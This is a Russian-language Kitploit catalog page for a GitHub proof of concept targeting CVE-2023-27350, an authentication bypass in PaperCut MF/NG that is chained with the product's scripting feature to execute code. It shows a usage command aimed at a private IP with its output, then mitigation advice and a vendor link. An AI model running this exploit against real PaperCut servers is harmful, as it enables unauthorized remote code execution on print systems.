Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/royall-researchers/cve-2023-27350
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Уязвимость PaperCut, затронутые версии — PaperCut MF или NG версии 8.0 и выше (за исключением исправленных версий) на всех платформах ОС.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
41 год назадЕщё не проверено

CVE-2023-27350

PoC для CVE-2023-27350, затрагивающей PaperCut MF/NG

##Затронутые версии: «PaperCut MF или NG версии 8.0 или новее (за исключением пропатченных версий) на всех платформах ОС.»

Краткое описание

Этот PoC использует уязвимость обхода аутентификации в сочетании с abuse встроенного функционала сценариев для выполнения кода.

Использование

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Способы смягчения

Обновите до последней версии или примените меры защиты, следуя инструкциям из бюллетеня безопасности PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Отказ от ответственности

Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для атаки на системы без явного на то разрешения. Авторы проекта не несут ответственности за неправомерное использование данного ПО. Используйте ответственно.

Скачать инструмент